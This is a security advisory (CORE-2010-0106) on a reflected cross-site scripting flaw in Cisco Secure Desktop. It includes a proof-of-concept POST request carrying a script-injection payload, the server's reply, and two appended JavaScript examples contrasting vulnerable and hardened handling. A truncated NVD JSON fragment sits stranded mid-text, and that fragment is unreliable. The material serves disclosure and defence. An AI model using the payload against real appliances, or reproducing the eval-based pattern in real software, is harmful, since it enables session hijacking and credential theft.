Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release
Vulnerability Information
Class: Cross site scripting [CWE-79]
Impact: Code execution (arbitrary script executed in the victim's browser)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440
CVSS v2 base score (NVD): 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Vulnerability Description
The Cisco Secure Desktop web application reflects the body of a POST
request to its translation endpoint back to the browser without
validating or encoding it. The reflected text is evaluated as JavaScript
by client-side code and written into the page, resulting in a cross-site
scripting vulnerability.
To exploit the vulnerability, the Secure Desktop feature must be enabled
on the Cisco appliance. No authentication to the appliance is required,
but the victim's browser has to be made to send the crafted POST request
(for example, from a malicious web page), so user interaction is needed.
Vulnerable packages
. Cisco Secure Desktop 3.4.2048
. Older versions are probably affected too, but they were not checked.
Non-vulnerable packages
. Cisco Secure Desktop 3.5.841
Vendor Information, Solutions and Workarounds
Cisco Security Alert:
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
Cisco's alert states that the problem is fixed in Cisco ASA software
8.0(5) and later, and that an ASA running Cisco Secure Desktop 3.5 or
later is not affected even with older ASA software. The NVD entry for
CVE-2010-0440 lists the issue as affecting Cisco Secure Desktop before
3.5 as used in ASA releases before 8.2(1), 8.1(2.7) and 8.0(5).
Credits
This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies. Cisco's alert additionally credits
Ernesto Alvarez of Core Security Technologies.
The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.
Technical Description / Proof of Concept Code
Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary script code in the context of the user's browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or to present a fake page that asks the user for
information (e.g. credentials). This class of vulnerability occurs when
user-supplied data is written into a page without encoding.
The Cisco Secure Desktop web application reflects the body of a POST
request without verifying or encoding it. The cross-site scripting
vulnerability was found in the following URL:
/-----
https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us
-----/
using the following POST body:
/-----
Starting, please wait..."><script>alert(1);</script>
-----/
The endpoint answers with a JavaScript statement that assigns the
submitted text to an entry of the 'trans' array. Only the double quote
is backslash-escaped in the reply (see the response in the proof of
concept below); '<' and '>' are returned as-is, so the value stored in
'trans' still contains live HTML markup. The reply is consumed by
'binary/mainv.js' (lines 282-287 of that file), which passes the raw
response text straight to 'eval()', and the translated strings are then
written into the 'start.html' page. Because attacker-controlled text is
both executed as JavaScript and inserted into the page markup, the
attacker can inject script that runs in the context of the vulnerable
host:
/-----
http_request.open('POST', path, false);
http_request.send(msgs);
var trans = new Array();
try {
eval(http_request.responseText);
} catch (e) {}
-----/
Proof of Concept
/-----
REQUEST:
POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56

Starting, please wait..."><script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122

trans["Starting, please wait...\"><script>alert(1);</script>"] =
"Starting, please wait...\"><script>alert(1);</script>";
-----/
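The round trip described above, as an added example that is not code from the advisory or from Cisco's product: a small model of the appliance's reply and of the mainv.js/start.html client behaviour, placed beside a hardened version that returns data instead of code, parses it instead of eval()'ing it, and HTML-encodes it before it reaches the page. The function names (translationReply, renderStatusVulnerable and so on) and the assumption that start.html concatenates the translated string into markup are mine; the only facts taken from the advisory are the PoC payload, the shape of the captured reply and the eval() call.

```javascript
// Added example modelling CORE-2010-0106; not Cisco's code.

// Constructed input: the exact POST body from the advisory's proof of concept.
const PAYLOAD = 'Starting, please wait..."><script>alert(1);</script>';

// ---- Vulnerable pipeline -------------------------------------------------

// Model of the appliance's reply to /+CSCOT+/translation. Assumption: only the
// double quote is backslash-escaped, which is all the captured response shows.
function translationReply(msg) {
  const q = msg.replace(/"/g, '\\"');
  return 'trans["' + q + '"] = "' + q + '";';
}

// Client side, as in binary/mainv.js: the reply text is eval()'d to fill 'trans'.
function applyTranslationsVulnerable(responseText) {
  var trans = new Array();
  try {
    eval(responseText); // direct eval: the reply can assign into 'trans'
  } catch (e) {}
  return trans;
}

// Model of start.html showing the status text. Assumption (mine): the string is
// concatenated into markup, innerHTML-style, without encoding.
function renderStatusVulnerable(trans, key) {
  const text = trans[key] !== undefined ? trans[key] : key;
  return '<span id="status" title="' + text + '">' + text + '</span>';
}

// ---- Hardened pipeline ---------------------------------------------------

// Server: answer with JSON data rather than an executable statement.
// JSON.stringify escapes '"', '\' and control characters; '<' and '>' are
// additionally escaped so the body can never contain a literal "</script>".
function translationReplyHardened(msg) {
  const obj = {};
  obj[msg] = msg;
  return JSON.stringify(obj).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}

// Client: parse, never execute. JSON.parse throws on anything that is not JSON,
// so a reply shaped like the vulnerable one (executable JavaScript) is rejected.
function applyTranslationsHardened(responseText) {
  const parsed = JSON.parse(responseText);
  const trans = Object.create(null); // no prototype: lookups cannot hit Object.prototype
  for (const k of Object.keys(parsed)) trans[k] = String(parsed[k]);
  return trans;
}

// Encode for HTML text and double-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderStatusHardened(trans, key) {
  const text = key in trans ? trans[key] : key;
  const safe = escapeHtml(text);
  return '<span id="status" title="' + safe + '">' + safe + '</span>';
}

// Check used below: did attacker text become a real <script> element?
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Run both pipelines on the PoC payload and report what reached the page.
function runDemo() {
  const vulnTrans = applyTranslationsVulnerable(translationReply(PAYLOAD));
  const vulnMarkup = renderStatusVulnerable(vulnTrans, PAYLOAD);
  const safeTrans = applyTranslationsHardened(translationReplyHardened(PAYLOAD));
  const safeMarkup = renderStatusHardened(safeTrans, PAYLOAD);
  return {
    vulnMarkup,
    safeMarkup,
    vulnInjected: containsScriptTag(vulnMarkup), // true: script tag landed in the DOM
    safeInjected: containsScriptTag(safeMarkup), // false: shown as literal text
  };
}

console.log(runDemo());
```

The hardened half changes three things at once, and each matters on its own: the reply is data, so an attacker cannot smuggle statements into it; the client parses rather than evaluates, so even a tampered reply cannot execute; and the value is encoded for the HTML context it is written into, which is the fix for the injection the PoC actually demonstrates.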
Report Timeline
. 2010-01-12:
Vendor contacted.
. 2010-01-12:
Cisco replies, saying that it will investigate the report.
. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.
. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.
. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.
. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.
. 2010-01-14:
Cisco confirms the February 5th release date.
. 2010-01-14:
Core acknowledges this release date.
. 2010-01-25:
Core asks for clarification on the non-vulnerable versions of the package.
. 2010-01-25:
Cisco replies with the non-vulnerable version of Cisco Secure Desktop.
. 2010-01-26:
Given that the non-vulnerable version of Cisco Secure Desktop has
already been released, Core requests to move the release date forward,
to February 1st.
. 2010-01-26:
Cisco agrees to move the release date forward.
. 2010-02-01:
The advisory CORE-2010-0106 is published.
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
About Core Security Technologies
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFLZy9lyNibggitWa0RAgTRAJ4lKTa+knGNpaqk+RwUe26bQEJBIwCeOrL1
B1t5rEq+DQYMZvLTaVhyDio=
=g4gM
-----END PGP SIGNATURE-----
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0440"], "modified": "2018-11-15T18:52:00", "cpe": [], "id": "CVE-2010-0440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0440", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}
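The proof-of-concept exchange in the Technical Description section shows the translation value echoed into a JavaScript assignment with only the double quote backslash-escaped, and the CVE description notes that the snippet is then eval'd and written into start.html. The following is an added example, not Cisco's code and not part of the original advisory: it places the weak escaping next to a hardened path (a proper JS string literal encoder plus HTML encoding at the point of output) and runs both on the advisory's own alert(1) value as constructed input. The function names (buildTranslationVulnerable, buildTranslationHardened, jsStringLiteral, htmlEncode, renderStatus, demo) and the simulated eval-and-render step are assumptions about how such a page behaves, not Cisco's implementation.

```javascript
// Added example (not Cisco's code, not from the advisory). Function names and
// the rendering simulation are assumptions; the input string is the value from
// the advisory's proof-of-concept request, embedded here as constructed data.

// Constructed sample, modelled on the advisory's POST body.
const UNTRUSTED_VALUE = 'Starting, please wait..."><script>alert(1);</script>';

// Weak pattern seen in the advisory's response: only the double quote is
// backslash-escaped before the value is placed in a JS string literal.
function buildTranslationVulnerable(key, value) {
  const esc = (s) => s.replace(/"/g, '\\"');
  return 'trans["' + esc(key) + '"] = "' + esc(value) + '";';
}

// Hardened: JSON.stringify yields a valid JS string literal (quotes,
// backslashes, control characters escaped) and "</" is broken to "<\/" so the
// literal can never terminate an enclosing <script> element when inlined.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/<\//g, '<\\/');
}

function buildTranslationHardened(key, value) {
  return 'trans[' + jsStringLiteral(key) + '] = ' + jsStringLiteral(value) + ';';
}

// HTML-encode a translated string before it is written into markup. Using
// textContent instead of innerHTML/document.write avoids the need entirely;
// this covers the markup-building path.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Stand-in for the page's behaviour: evaluate the translation snippet to fill
// the table, then build the status markup. Returns the HTML that would reach
// the DOM; `encode` selects whether the output step HTML-encodes the value.
function renderStatus(snippet, key, encode) {
  const trans = {};
  new Function('trans', snippet)(trans); // stand-in for the eval in the page
  const text = trans[key];
  return '<div id="status">' + (encode ? htmlEncode(text) : text) + '</div>';
}

// Runs both paths on the constructed value and returns the resulting markup.
function demo() {
  const key = UNTRUSTED_VALUE;
  const vulnerable = renderStatus(buildTranslationVulnerable(key, key), key, false);
  const hardened = renderStatus(buildTranslationHardened(key, key), key, true);
  return { vulnerable, hardened };
}

const result = demo();
console.log('vulnerable markup:', result.vulnerable);
console.log('hardened markup:  ', result.hardened);
```

Running it with node prints the two markup strings: the weak path leaves a raw `<script>` element in the status markup, while the hardened path yields `&lt;script&gt;` text only. The two encoders address two different contexts, and both are needed: `jsStringLiteral` keeps the value inside the JS string (and stops `</script>` from ending the enclosing element), while `htmlEncode` keeps it inert when the string is later inserted into HTML. Escaping for only one context, as the response in the advisory does, is what lets the value reach the DOM as markup.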